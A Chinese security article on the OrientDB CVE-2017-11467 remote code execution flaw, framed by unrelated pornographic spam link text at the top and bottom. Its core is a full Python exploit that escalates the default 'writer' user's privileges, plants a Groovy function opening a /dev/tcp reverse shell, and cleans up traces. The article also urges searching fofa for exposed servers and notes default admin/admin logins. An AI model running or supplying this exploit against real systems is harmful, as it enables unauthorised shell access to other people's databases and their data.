精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

OrientDB遠程代碼執(zhí)行漏洞利用與分析

原創(chuàng)
作者:陳小兵
安全 應(yīng)用安全
OrientDB數(shù)據(jù)庫是一個支持分布式的NoSQL數(shù)據(jù)庫,主要針對文檔以及圖形等進行檢索,通過研究發(fā)現(xiàn)其默認配置admin、reader和writer三個角色,在處理where”或“fetchplan”或“order by”函數(shù)時,由于在OrientDB中有一個執(zhí)行g(shù)roovy函數(shù),groovy包裝類沒有沙箱,暴露了系統(tǒng)函數(shù),因此我們可以運行我們想要的任何命令。該漏洞在國外被命名為CVE-2017-11467,本文主要對該漏洞的分析方法和實戰(zhàn)進行探討。

[[200752]]

【51CTO.com原創(chuàng)稿件】OrientDB數(shù)據(jù)庫是一個支持分布式的NoSQL數(shù)據(jù)庫,主要針對文檔以及圖形等進行檢索,通過研究發(fā)現(xiàn)其默認配置admin、reader和writer三個角色,在處理where”或“fetchplan”或“order by”函數(shù)時,由于在OrientDB中有一個執(zhí)行g(shù)roovy函數(shù),groovy包裝類沒有沙箱,暴露了系統(tǒng)函數(shù),因此我們可以運行我們想要的任何命令。該漏洞在國外被命名為CVE-2017-11467,本文主要對該漏洞的分析方法和實戰(zhàn)進行探討。

0x01.OrientDB簡介

OrientDB是分布式兼具文檔數(shù)據(jù)庫的靈活性和圖形數(shù)據(jù)庫管理鏈接能力的可深層次擴展的文檔-圖形數(shù)據(jù)庫管理系統(tǒng),也是可升級,高性能的操作NoSQL數(shù)據(jù)庫。可選無模式、全模式或混合模式下。支持許多高級特性,諸如ACID事務(wù)、快速索引,原生和SQL查詢功能。可以JSON格式導(dǎo)入、導(dǎo)出文檔。若不執(zhí)行昂貴的JOIN操作的話,如同關(guān)系數(shù)據(jù)庫可在幾毫秒內(nèi)可檢索數(shù)以百G的鏈接文檔圖,其最新版本為OrientDB v2.2.26。官方網(wǎng)站:http://orientdb.comhttps://github.com/Orientechnologies。

圖1Orientdb

0x02. OrientDB基礎(chǔ)

2.1OrientDB的一些基本概念

Classes : 類比關(guān)系型數(shù)據(jù)庫系統(tǒng)中的Table與傳統(tǒng)文檔數(shù)據(jù)庫的collections。這個概念來自于OOP(Object-oriented programming)的理念。class用于定義數(shù)據(jù)結(jié)構(gòu)的模型。

Record:record是OrientDB中最小的加載和存儲的單位。record有四種類型:Document、RecordBytes(BLOB)、Vertex、Edge。

Document:是OrientDB中最靈活的record。Document支持schema-less,schemal-full,schema-mixed,即可以在定義數(shù)據(jù)結(jié)構(gòu)的時候指定屬性及約定條件,也可以不指定。它通過create class語法來定義一個數(shù)據(jù)結(jié)構(gòu)。

Vertex:在OrientDB的graph模型下,每個結(jié)點叫作Vertex,每個Vertex也是一個Document。

Edge:在OrientDB的graph模型下,連接兩個Vertex的邊叫作Edge。Edge是有向性的而且僅能連接兩個Vertex。

Clusters : 用于存儲record。每個數(shù)據(jù)庫最多有32767個cluster。每個class都必須至少有一個對應(yīng)的cluster。默認情況下OrientDB會自動為每個class創(chuàng)建與當(dāng)前cpu核數(shù)相同的cluster,其中有一個默認的cluster。

Cluster Selection:當(dāng)新增加一條reocrd時OrientDB會根據(jù)cluster section為這條記錄選擇一個cluster。cluster section有四條類型:detault、round-robin、balanced、local。

Record ID :每個record都有一個record id。 record id的格式如下:

  1. #<cluster-id>:<cluster-position>。 

Relationships: OrientDB中不使用join,它通過在每個reocrd中定義一個關(guān)系類型的屬性來維護關(guān)系。這個關(guān)系屬性存儲的實際是record id,就像定義一個指針在內(nèi)存中將兩個record聯(lián)系起來。

Inheritance & Polymorphic: OrientDB支持面向?qū)ο蟮睦^承和多態(tài)特性。

2.2OrientDB的特性

OrientDB是用Java語言實現(xiàn)的,運行在JVM之上。

Multi-Model:OrientDB支持多種模型:Key/Value, Object, Document, and Graph。

Multi-Master Replication: OrientDB集群部署時每個點都是Master,每個Master上都有完整的數(shù)據(jù)。一旦一個Master上的數(shù)據(jù)發(fā)生變更,會將發(fā)生變更的數(shù)據(jù)同步通知其它Master。

Extended SQL : OrientDB支持大部分標(biāo)準(zhǔn)的SQL,同時在標(biāo)準(zhǔn)的SQL之上擴展了部分功能以方便圖的操作。

Easy Integration :使用teleporter可以很容易地將數(shù)據(jù)從RDBMS遷移到OrientDB上。

OOP:OrientDB定義數(shù)據(jù)結(jié)構(gòu)的Class符合OOP(Object-oriented programming)的理念,支持繼承和多態(tài)的特性。

2.2OrientDB的SQL

在寫圖數(shù)據(jù)庫的SQL時,第一步是要確認起始點(這個也是圖數(shù)據(jù)庫比較耗時的地方),一旦起始點確認后,我們便可以近乎物理連接的方式查詢這個起始點相關(guān)聯(lián)的數(shù)據(jù)。

基本的SQL:OrientDB支持大部分標(biāo)準(zhǔn)的SQL查詢。

例如:SELECT FROM Person WHERE name LIKE 'Luk%'

Traverse:traverse語法可以遍歷獲取一個record聯(lián)結(jié)的reocrd。它比select使用起來更簡單和快速。

例如:RAVERSE out("Friend") FROM #10:1234 WHILE $depth <= 3

Match:match是一種表述力很強的查詢語法結(jié)構(gòu),類比Neo4j的Cypher語法結(jié)構(gòu)。它以一種說明式的方式來查詢。

例如:

  1. MATCH {class: Person, as: person, where: (name = 'John' AND surname = 'Doe')}.both('Friend').both('Friend' 
  2. {as: friendOfFriend} RETURN person, friendOfFriend 

0x03. OrientDB漏洞 CVE-2017-11467分析

3.1搭建測試環(huán)境

(1)docker安裝,這個安裝的是最新版本,有可能修補了漏洞

  1. docker run -d --name orientdb -p 2424:2424 -p 2480:2480 -e ORIENTDB_ROOT_PASSWORD=root orientdb:latest 

(2)linux下安裝orientdb

  1. wget -O orientdb-community-2.2.22.tar.gz http://orientdb.com/download.php?file=orientdb-community-2.2.22.tar.gz&os=linux  
  2. tar -zxf orientdb-community-2.2.22.tar.gz 
  3. mv orientdb-community-2.2.22 /opt/orientdb  
  4. /opt/orientdb/bin/server.sh  
  5. useradd -r orientdb -s /sbin/nologin 
  6. chown -R orientdb:orientdb /opt/orientdb  
  7. chmod 640 /opt/orientdb/config/orientdb-server-config.xml 
  8. cp /opt/orientdb/bin/orientdb.service /etc/systemd/system  
  9. vi /etc/systemd/system/orientdb.service  
  10. 修改User=ORIENTDB_USER Group=ORIENTDB_GROUP ExecStart=$ORIENTDB_HOME/bin/server.sh為: 
  11. User=orientdb Group=orientdb ExecStart=/opt/orientdb/bin/server.sh 
  12. systemctl daemon-reload 
  13. systemctl enable orientdb 
  14. systemctl status orientdb 

注意:

(1)如果是虛擬機,則需要修改內(nèi)存大小,默認64位是512G,修改為1G!需要修改/opt/orientdb/bin下的所有bat文件和sh文件。否則會報“Invalid maximum direct memory size: -XX:MaxDirectMemorySize=512g”錯誤。

(2)設(shè)置路徑和用戶,在對應(yīng)的sh文件中設(shè)置

  1. ORIENTDB_DIR="/opt/orientdb/" 
  2. ORIENTDB_USER="orientdb" 

3.2漏洞分析

1.用戶權(quán)限

OrientDB使用RBAC模型進行認證方案。默認情況下,OrientDB有3個角色:管理員(admin),作者(writer)和讀者(reader)。這些用戶名與角色相同。對于在服務(wù)器上創(chuàng)建的每個數(shù)據(jù)庫,默認情況下分配這3個用戶。

用戶的權(quán)限是:

admin:訪問數(shù)據(jù)庫上的所有功能,沒有任何限制

reader:只讀用戶。讀者可以查詢數(shù)據(jù)庫中的任何記錄,但不能修改或刪除它們。它不能訪問內(nèi)部信息,例如用戶和角色本身。

writer:與“讀者”相同,但也可以創(chuàng)建,更新和刪除記錄

2.越權(quán)導(dǎo)致命令執(zhí)行

ORole結(jié)構(gòu)處理用戶及其角色,只能由管理員訪問。OrientDB需要oRole讀取權(quán)限來允許用戶顯示用戶的權(quán)限以及與oRole權(quán)限相關(guān)聯(lián)的其他查詢。但在版本2.2.x中,每當(dāng)上述oRole查詢包含where、fetchplan和ORDER BY語句,則不需要此權(quán)限的要求和信息,而返回給未經(jīng)授權(quán)的用戶從而導(dǎo)致命令執(zhí)行

例:

  1. select * from <em>oRole</em> order by name

當(dāng)每個數(shù)據(jù)庫創(chuàng)建時會創(chuàng)建writer用戶,這樣,即使db管理員更改管理員用戶密碼,攻擊者仍然可以使用writer用戶獲取代碼執(zhí)行。由于我們啟用了where、fetchplan和ORDER BY函數(shù),在OrientDB中有一個執(zhí)行g(shù)roovy函數(shù),groovy包裝類沒有沙箱,暴露了系統(tǒng)函數(shù),因此我們可以運行我們想要的任何命令。

示例Groovy函數(shù):

  1. Command.md 
  2. def command = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 8081 
  3. >/tmp/f' 
  4.  File file = new File("hello.sh"
  5.  file.delete() 
  6.  file << ("#!/bin/bash\n"
  7.  file << (command) 
  8.  def proc = "bash hello.sh".execute() 

3.概念證明

(1)監(jiān)聽8081端口。

在8081端口運行Netcat:nc -lv 8081

運行以下命令:

  1. python PoC.py ip [port] 

(2)poc.py

  1. import sys 
  2. import requests 
  3. import json 
  4. import string 
  5. import random 
  6. target = sys.argv[1] 
  7. try: 
  8.     port = sys.argv[2] if sys.argv[2] else 2480 
  9. except
  10.     port = 2480 
  11. url = "http://%s:%s/command/GratefulDeadConcerts/sql/-/20?format=rid,type,version,class,graph"%(target,port) 
  12. def random_function_name(size=5, chars=string.ascii_lowercase + string.digits): 
  13.     return ''.join(random.choice(chars) for _ in range(size)) 
  14. def enum_databases(target,port="2480"): 
  15.     base_url = "http://%s:%s/listDatabases"%(target,port) 
  16.     req = requests.get(base_url) 
  17.     if req.status_code == 200: 
  18.         #print "[+] Database Enumeration successful" 
  19.         database = req.json()['databases'
  20.         return database 
  21.     return False 
  22. def check_version(target,port="2480"): 
  23.     base_url = "http://%s:%s/listDatabases"%(target,port) 
  24.     req = requests.get(base_url) 
  25.     if req.status_code == 200: 
  26.         headers = req.headers['server'
  27.         #print headers 
  28.         if "2.2" in headers or "3." in headers: 
  29.             return True 
  30.     return False 
  31. def run_queries(permission,db,content=""): 
  32.     databases = enum_databases(target) 
  33.     url = "http://%s:%s/command/%s/sql/-/20?format=rid,type,version,class,graph"%(target,port,databases[0]) 
  34.     priv_enable = ["create","read","update","execute","delete"
  35.     #query = "GRANT create ON database.class.ouser TO writer" 
  36.     for priv in priv_enable: 
  37.  
  38.         if permission == "GRANT"
  39.             query = "GRANT %s ON %s TO writer"%(priv,db) 
  40.         else
  41.             query = "REVOKE %s ON %s FROM writer"%(priv,db) 
  42.         req = requests.post(url,data=query,auth=('writer','writer')) 
  43.         if req.status_code == 200: 
  44.             pass 
  45.         else
  46.             if priv == "execute"
  47.                 return True 
  48.             return False 
  49.  
  50.     print "[+] %s"%(content) 
  51.     return True 
  52. def priv_escalation(target,port="2480"): 
  53.     print "[+] Checking OrientDB Database version is greater than 2.2" 
  54.     if check_version(target,port): 
  55.         priv1 = run_queries("GRANT","database.class.ouser","Privilege Escalation done checking enabling operations on database.function"
  56.         priv2 = run_queries("GRANT","database.function","Enabled functional operations on database.function"
  57.         priv3 = run_queries("GRANT","database.systemclusters","Enabling access to system clusters"
  58.         if priv1 and priv2 and priv3: 
  59.             return True 
  60.     return False 
  61. def exploit(target,port="2480"): 
  62.     #query = '"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"most","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/0.0.0.0/8081 0>&1\';File file = new File(\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash hello.sh\".execute(); ","parameters":null' 
  63.     #query = {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"ost","language":"groovy","code":"def command = 'whoami';File file = new File(\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash hello.sh\".execute(); ","parameters":None} 
  64.     func_name = random_function_name() 
  65.     print func_name 
  66.     databases = enum_databases(target) 
  67.     reverse_ip = raw_input('Enter the ip to connect back: '
  68.     query = '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/'+reverse_ip+'/8081 0>&1\';File file = new File(\\"hello.sh\\");file.delete();file << (\\"#!/bin/bash\\\\n\\");file << (command);def proc = \\"bash hello.sh\\".execute();","parameters":null}' 
  69.     #query = '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def command = \'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 8081 >/tmp/f\' \u000a File file = new File(\"hello.sh\")\u000a     file.delete()       \u000a     file << (\"#!/bin/bash\")\u000a     file << (command)\n    def proc = \"bash hello.sh\".execute() ","parameters":null}' 
  70.     #query = {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"lllasd","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/0.0.0.0/8081 0>&1\';File file = new File(\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def proc = \"bash hello.sh\".execute();","parameters":None} 
  71.     req = requests.post("http://%s:%s/document/%s/-1:-1"%(target,port,databases[0]),data=query,auth=('writer','writer')) 
  72.     if req.status_code == 201: 
  73.         #print req.status_code 
  74.         #print req.json() 
  75.         func_id = req.json()['@rid'].strip("#"
  76.         #print func_id 
  77.         print "[+] Exploitation successful, get ready for your shell.Executing %s"%(func_name) 
  78.         req = requests.post("http://%s:%s/function/%s/%s"%(target,port,databases[0],func_name),auth=('writer','writer')) 
  79.         #print req.status_code 
  80.         #print req.text 
  81.         if req.status_code == 200: 
  82.             print "[+] Open netcat at port 8081.." 
  83.         else
  84.             print "[+] Exploitation failed at last step, try running the script again." 
  85.             print req.status_code 
  86.             print req.text 
  87.         #print "[+] Deleting traces.." 
  88.         req = requests.delete("http://%s:%s/document/%s/%s"%(target,port,databases[0],func_id),auth=('writer','writer')) 
  89.         priv1 = run_queries("REVOKE","database.class.ouser","Cleaning Up..database.class.ouser"
  90.         priv2 = run_queries("REVOKE","database.function","Cleaning Up..database.function"
  91.         priv3 = run_queries("REVOKE","database.systemclusters","Cleaning Up..database.systemclusters"
  92.         #print req.status_code 
  93.         #print req.text 
  94. def main(): 
  95.     target = sys.argv[1] 
  96.     #port = sys.argv[1] if sys.argv[1] else 2480 
  97.     try: 
  98.         port = sys.argv[2] if sys.argv[2] else 2480 
  99.         #print port 
  100.     except
  101.         port = 2480 
  102.     if priv_escalation(target,port): 
  103.         exploit(target,port) 
  104.     else
  105.         print "[+] Target not vulnerable" 
  106.  
  107. main() 

0x04.歷史漏洞

  • CVE-2017-11467(高危)

OrientDB通過2.2.22在“where”或“fetchplan”或“order by”使用期間不執(zhí)行特權(quán)要求,允許遠程攻擊者通過精心制作的請求執(zhí)行任意操作系統(tǒng)命令。

  • CVE-2015-2918

在2.0.1之前的2.0.15和2.1.x之前的OrientDB Server Community Edition中的Studio組件沒有適當(dāng)?shù)叵拗剖褂肍RAME元素,這使遠程攻擊者更容易通過精心設(shè)計的網(wǎng)站進行劫持攻擊。

  • CVE-2015年-2913

server/network/protocol/http/OHttpSessionManager.java在OrientDB Server社區(qū)版的Studio組件2.0.15、2.1.x和2.1.1之前版本不正確地依賴于java.util.Random類來生成隨機Session ID值,這使遠程攻擊者更容易通過確定此類中的PRNG的內(nèi)部狀態(tài)來預(yù)測值。

  • CVE-2015-2912

在2.0.1之前的2.0.15和2.1.x之前的OrientDB Server Community Edition的Studio組件中的JSONP端點沒有適當(dāng)?shù)叵拗苹卣{(diào)值,這允許遠程攻擊者通過精心設(shè)計的HTTP請求進行跨站點請求偽造(CSRF)攻擊,并獲得敏感信息。

0x05.實戰(zhàn)CVE-2017-11467漏洞利用

1.安裝poc.py所需的組件

直接執(zhí)行python CVE-2017-11467.py 127.0.0.1后,出現(xiàn)錯誤,如圖2所示,則表示需要requests組件的支持,可以到https://pypi.python.org/pypi/requests/#downloads下載requests-2.18.4.tar.gz,可參考下載地址:

https://pypi.python.org/packages/b0/e1/eab4fc3752e3d240468a8c0b284607899d2fbfb236a56b7377a329aa8d09/requests-2.18.4.tar.gz

解壓requests-2.18.4.tar.gz文件后,使用python setup.py install進行安裝。

圖2需要安裝requests組件

2.尋找OrientDB

zoomeye目前在升級,因此用https://fofa.sol來進行搜索效果比較佳,關(guān)鍵詞“orientdb && port=2480”,對于2.2.X版本基本是通殺。獲取結(jié)果后,通過單擊鏈接來查看可否正常訪問。能夠正常訪問,登錄密碼一般都是admin/admin。

3.執(zhí)行命令

(1)檢測是否存在漏洞

例如python CVE-2017-11467.py 127.0.0.1后其結(jié)果:

  1. C:\Python27>python CVE-2017-11467.py 127.0.0.1 
  2. [+] Checking OrientDB Database version is greater than 2.2 
  3. [+] Privilege Escalation done checking enabling operations on database.function 
  4. [+] Enabled functional operations on database.function 
  5. [+] Enabling access to system clusters 
  6. 8bd94 
  7. Enter the ip to connect back: 59.***. ***.*** //輸入反彈的IP地址,注意前后無空格 
  8. [+] Exploitation successful, get ready for your shell.Executing 8bd94 
  9. [+] Exploitation failed at last step, try running the script again. 
  10. 400 
  12.   "errors": [ 
  13.     { 
  14.       "code": 400, 
  15.       "reason""Bad request"
  16.       "content": "Error on evaluation of the script library. Error: org.codehaus 
  17. .groovy.control.MultipleCompilationErrorsException: startup failed:\u000aScript1 
  18. .groovy: 1: unexpected token: def @ line 1, column 1.\u000a   def 8bd94() {\u000 
  19. a   ^\u000a\u000a1 error\u000a\u000aScript library was:\u000adef 8bd94() {\u000a 
  20. def command = 'bash -i >& /dev/tcp/59.110.62.194/8081 0>&1';File file = new File 
  21. (\"hello.sh\");file.delete();file << (\"#!/bin/bash\\n\");file << (command);def 
  22. proc = \"bash hello.sh\".execute();\u000a}\u000a\u000a\u000d\u000a\u0009DB name
  23. \"hierarchies\"" 
  24.     } 
  25.   ] 
  27. [+] Cleaning Up..database.class.ouser 
  28. [+] Cleaning Up..database.function 
  29. [+] Cleaning Up..database.systemclusters 

(2)設(shè)置反彈的IP

如果檢測到目標(biāo)對象存在漏洞,則提示輸入一個反彈的IP地址,該IP地址事先需要進行8081端口監(jiān)聽,如果命令執(zhí)行成功則獲取反彈的shell,執(zhí)行效果如圖3和圖4所示。

圖3命令執(zhí)行漏洞檢測

圖4獲取反彈的shell

注意:

(1)由于命令是針對linux,因此反彈IP前不能有空格,否則執(zhí)行不成功。

(2)反彈端口可以更改poc中的8081

(3)OrientDB數(shù)據(jù)庫密碼是加密的。例如獲取某數(shù)據(jù)庫配置文件中的數(shù)據(jù)庫用戶和密碼:

  1. <user resources="*" password="{PBKDF2WithHmacSHA256}3D2969BF5BF1E819C6358CEF534327A32D205928D77B6D47:56B6EE75711C3600BCB23011685F253EE3F645E1BFA70AB8:65536" name="root"/> 
  2.        <user resources="connect,server.listDatabases,server.dblist" password="{PBKDF2WithHmacSHA256}AD0DA873F5BEB2343257A07B51326BBAECF8A894F960328E:B183077FF32DD1F40F3031EF048F5D8169E7EB6FB3C09004:65536" name="guest"/> 

【51CTO原創(chuàng)稿件,合作站點轉(zhuǎn)載請注明原文作者和出處為51CTO.com】

責(zé)任編輯:武曉燕 來源: 51CTO專欄
OrientDB利用分析
相關(guān)推薦

2016-09-29 14:37:39

ImageMagick漏洞分析

2020-10-08 13:44:27

漏洞

2014-08-27 16:22:19

2015-06-18 10:49:31

2025-06-12 08:38:18

2021-01-26 10:00:45

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2017-05-25 22:20:05

2015-09-20 20:13:55

2015-03-06 15:31:01

2016-04-29 10:58:13

2024-11-19 15:58:56

2024-12-19 13:42:48

2017-05-27 10:22:37

2020-10-28 14:58:21

漏洞uTorrent協(xié)議層

2011-08-04 13:53:04

2019-05-15 15:20:01

微軟漏洞防護

2015-04-30 08:11:40

2014-09-12 17:47:36

2023-12-14 16:20:09

2014-10-29 15:44:55

點贊
收藏

51CTO技術(shù)棧公眾號

亚洲黑丝一区二区| 日韩精品视频在线看| 欧美激情一区不卡| 91精品在线影院| 久久中文字幕在线观看| 欧美网色网址| 精品视频一区二区三区免费| 91精品国产吴梦梦| 欧美日韩免费做爰大片| 精品一区二区三区免费毛片爱| 久久99亚洲精品| 久久亚洲无码视频| 97青娱国产盛宴精品视频| 婷婷综合久久一区二区三区| 亚洲一二区在线| 天天干天天干天天干| 麻豆精品在线播放| 91国产中文字幕| 国产黄a三级三级| 久久悠悠精品综合网| 欧美日韩国产综合一区二区 | 午夜视频在线看| 成人免费视频播放| 国产在线不卡精品| 国产精品一区二区三区四| 中文在线日韩| 中文字幕在线成人| 日韩精品卡通动漫网站| 日韩中文在线| 欧美日本免费一区二区三区| 北条麻妃69av| 欧美精品videosex| 国产精品毛片久久久久久久| 蜜桃av色综合| 欧美天堂在线视频| 国产馆精品极品| 国产日韩精品在线播放| 不卡av电影在线| 最新日韩在线| 久久久久久久久久久免费| 我要看黄色一级片| 久久人人88| 中日韩午夜理伦电影免费| 久久中文字幕人妻| 精品三级av在线导航| 日韩精品一区二区三区三区免费| 超碰在线人人爱| 欧洲成人一区| 在线免费av一区| 精品久久久久久久免费人妻| 中文字幕在线免费观看视频| 欧美视频一二三| 九色在线视频观看| 黄色在线观看www| 亚洲高清在线精品| 日韩xxxx视频| 黄色18在线观看| 黑丝美女久久久| 国产日产欧美视频| 午夜日韩成人影院| 欧美性生活大片视频| 黄色aaa级片| 日韩成人精品一区二区三区| 欧美理论电影在线| 亚洲一区二区中文字幕在线观看| 国产一区2区在线观看| 7777精品伊人久久久大香线蕉经典版下载 | 国产在线视频网站| 欧美极品xxx| 午夜精品福利一区二区| 日本激情视频在线观看| 亚洲激情第一区| 国产精品久久中文字幕| 香蕉伊大人中文在线观看| 欧美午夜久久久| 九九热免费精品视频| 亚洲网站三级| 欧美成人性福生活免费看| 欧美xxxxx少妇| 一区二区三区四区在线看| 在线午夜精品自拍| 国产精品免费人成网站酒店| 国产一区二区三区四区老人| 668精品在线视频| 久久这里只有精品9| 久久成人麻豆午夜电影| 99国产在线观看| 欧美中文在线| 亚洲欧美区自拍先锋| 国产精品专区在线| 欧美不卡高清一区二区三区| 宅男在线国产精品| 香港三日本8a三级少妇三级99| 美女少妇全过程你懂的久久| 久久精彩免费视频| 欧美福利视频一区二区| 免播放器亚洲一区| 国产98在线|日韩| 国产视频网站在线| 一区二区三区在线视频免费观看| 国产av天堂无码一区二区三区| 欧美动物xxx| 91精品国产欧美一区二区18| 中文字幕影片免费在线观看| 天天精品视频| 欧美与欧洲交xxxx免费观看| 国产精品无码在线播放| 久久久夜色精品亚洲| 激情五月五月婷婷| 午夜无码国产理论在线| 日韩欧美国产三级| 国产精品理论在线| 99这里有精品| 95av在线视频| 一级毛片视频在线| 欧美日韩在线视频观看| 四虎国产精品免费| 日韩免费在线| 日韩av免费网站| 日本高清视频网站| 樱花影视一区二区| 一个色综合久久| 国产精品美女久久久久久不卡| 九九热精品视频| 国产又粗又猛又黄又爽| 国产午夜精品一区二区三区视频 | 韩国成人免费视频| 欧美蜜桃一区二区三区| 欧美人与性囗牲恔配| 亚洲大片在线| 91成人在线看| 日本在线观看视频| 精品视频在线视频| 日本成人免费视频| 毛片一区二区| 国产区二精品视| 亚洲综合图区| 欧美一级精品大片| 国产色无码精品视频国产| 日韩成人一区二区三区在线观看| 国新精品乱码一区二区三区18| 黄色一级片在线观看| 欧美日韩精品一二三区| 国产精品久久久视频| 日本色综合中文字幕| 欧美二区在线| 成人线上视频| 亚洲一二在线观看| 波多野结衣激情视频| 91色|porny| 成年人视频观看| 欧美亚洲色图校园春色| 欧美极品美女电影一区| www.亚洲黄色| 亚洲女爱视频在线| 性色av浪潮av| 中文字幕人成人乱码| 91精品中文在线| 搞黄网站在线观看| 欧美一区日本一区韩国一区| 国产女人18水真多毛片18精品| 国产一区在线观看视频| 国产精品久久久影院| 一区二区免费| 久久全球大尺度高清视频| 欧美熟妇乱码在线一区| 欧美日韩亚洲91| 手机免费看av| 奇米影视7777精品一区二区| 中文字幕精品一区日韩| 激情综合婷婷| 国内精品中文字幕| 黄网在线免费| 777色狠狠一区二区三区| 免费日韩在线视频| 99久久99久久综合| 国产福利影院在线观看| 欧美黄色一区| 久久国产精品免费一区| yiren22亚洲综合| 免费99精品国产自在在线| 国产成人手机在线| 日本久久电影网| 丝袜 亚洲 另类 欧美 重口 | 欧美日韩国产a| 男女免费视频网站| 久久精品亚洲国产奇米99| www.国产福利| 国产欧美一级| 深夜福利成人| av成人资源网| 国产精品美女久久久久av超清| 搞黄网站在线观看| 亚洲欧美激情一区| 99国产成人精品| 欧美性色19p| 丝袜美腿小色网| 久久蜜臀中文字幕| 巨乳女教师的诱惑| 日韩国产欧美在线观看| 精品丰满人妻无套内射| 手机在线电影一区| 久久久99爱| 欧美第一在线视频| 日本高清视频一区| 俺来俺也去www色在线观看| 中文字幕精品久久| 天堂在线资源库| 欧美一卡二卡在线| 精品人妻一区二区三区潮喷在线| 伊人开心综合网| 久久久国产一级片| 久久久久久免费| 中文字幕制服丝袜| 美国欧美日韩国产在线播放| 日韩中文字幕在线视频观看| 亚洲成人av| 亚洲人成网站在线观看播放| 欧美综合精品| 国产成人av一区二区三区| 国产国产一区| 国产v综合ⅴ日韩v欧美大片| 91九色美女在线视频| 精品久久久91| 在线观看国产精品一区| 尤物网站在线看| 一本到在线视频| 中文字幕第一页久久| 中文字幕一区三区久久女搜查官| 精品亚洲国产成人av制服丝袜| 狠狠爱免费视频| 亚洲高清av| 欧美一级爱爱视频| 水蜜桃久久夜色精品一区| 欧美在线视频二区| 日韩电影在线观看完整免费观看| 亚洲一区二区三区在线视频| 青青青国产精品| 国产精品久久在线观看| 毛片免费看不卡网站| 欧美影院久久久| 超碰一区二区| 茄子视频成人在线| 成人福利av| 国产成人精品电影| 色香欲www7777综合网| 浅井舞香一区二区| 日本精品网站| 国产免费一区二区三区在线能观看| 日韩久久一区二区三区| 日本精品一区二区三区在线| 欧美大片免费高清观看| 日韩美女免费线视频| 人人鲁人人莫人人爱精品| 欧美中文字幕视频| 日韩免费va| 91精品久久久久久久久久久久久久 | 久久综合国产精品| 女~淫辱の触手3d动漫| 久久综合中文字幕| 男人舔女人下部高潮全视频| 国产欧美在线观看一区| 国产视频123区| 亚洲精品国产高清久久伦理二区| 国产高潮国产高潮久久久91| 一区二区在线观看免费视频播放| 青青草国产在线观看| 亚洲国产aⅴ成人精品无吗| 国产免费av一区| 欧美羞羞免费网站| av中文字幕观看| 亚洲成人精品av| 蜜桃成人在线视频| 日日狠狠久久偷偷四色综合免费 | 亚洲国产精品suv| 亚洲国产精品视频在线观看| 国产理论电影在线观看| www.日韩欧美| 欧洲一区精品| 国产日韩综合一区二区性色av| 日韩成人精品| 免费毛片一区二区三区久久久| 黑人操亚洲人| 17c丨国产丨精品视频| 亚洲一区亚洲| 天美一区二区三区| 91网站在线播放| 日本黄色录像视频| 精品久久久久久久中文字幕| 亚洲一卡二卡在线| 亚洲二区中文字幕| 97电影在线| 久久久天堂国产精品女人| 经典三级一区二区| 99精品99久久久久久宅男| 亚洲精品456| 欧洲精品视频在线| 首页亚洲欧美制服丝腿| 精产国品一区二区三区| 久久久久久影视| 免费人成视频在线| 精品视频1区2区| 日韩一区免费视频| 久久精品久久久久久| 午夜激情在线播放| 99一区二区三区| 日韩国产一区二区| av黄色在线网站| 国产福利一区在线观看| 少妇av片在线观看| 天天影视网天天综合色在线播放| 亚洲熟妇av乱码在线观看| 精品亚洲国产视频| 亚洲淫性视频| 91精品国产综合久久久久久蜜臀 | 日本一本中文字幕| 韩国三级电影一区二区| 91中文字幕永久在线| 亚洲午夜激情网页| 国产黄色片网站| 最新国产精品拍自在线播放 | 欧美做受xxxxxⅹ性视频| 一级做a爱片久久| 国产精品色综合| 在线看日韩欧美| 欧美电影免费观看| 久久国产精品免费一区| 亚洲激情社区| 佐佐木明希电影| 亚洲欧美视频在线观看| 97成人在线观看| 在线日韩精品视频| 麻豆精品蜜桃| 日本在线观看一区二区| 免费视频一区| 亚洲精品视频大全| 精品久久中文字幕久久av| 欧美 日韩 国产 精品| 欧美大秀在线观看| 国产精品一区二区美女视频免费看| 亚洲国产成人不卡| 免费成人在线影院| 成人无码精品1区2区3区免费看| 欧美综合天天夜夜久久| 精品视频三区| 国产精品久久久久久久久久三级 | 国产精品视频一区视频二区| 亚洲一区二区三区四区中文| 免费人成在线不卡| 精品少妇一区二区三区密爱| 欧美色涩在线第一页| 91.xxx.高清在线| 国产欧美精品一区二区三区-老狼 国产欧美精品一区二区三区介绍 国产欧美精品一区二区 | 国产精品麻豆欧美日韩ww| 伊人网综合在线| 久久久av网站| 日本在线成人| 老太脱裤子让老头玩xxxxx| 97se亚洲国产综合自在线不卡| 日产欧产va高清| 亚洲伦理中文字幕| 国产成人免费9x9x人网站视频| 日韩和欧美的一区二区| 欧美aa在线视频| www.xxxx日本| 亚洲国产精品高清久久久| 在线天堂资源www在线污| 欧美自拍资源在线| 久久国产欧美日韩精品| 欧美日韩午夜视频| 亚洲第一av在线| 色尼玛亚洲综合影院| 亚洲一卡二卡三卡四卡无卡网站在线看| 久久成人免费网| 国产在线拍揄自揄拍无码视频| 日韩电影中文字幕在线观看| 另类专区亚洲| 99热这里只有精品7| 豆国产96在线|亚洲| 日本视频在线观看免费| 中文字幕亚洲一区二区三区| 久久九九精品视频| 国模吧无码一区二区三区| 国产精品国产三级国产aⅴ无密码| va婷婷在线免费观看| 97视频在线免费观看| 日韩精品诱惑一区?区三区| 少妇献身老头系列| 91国在线观看| 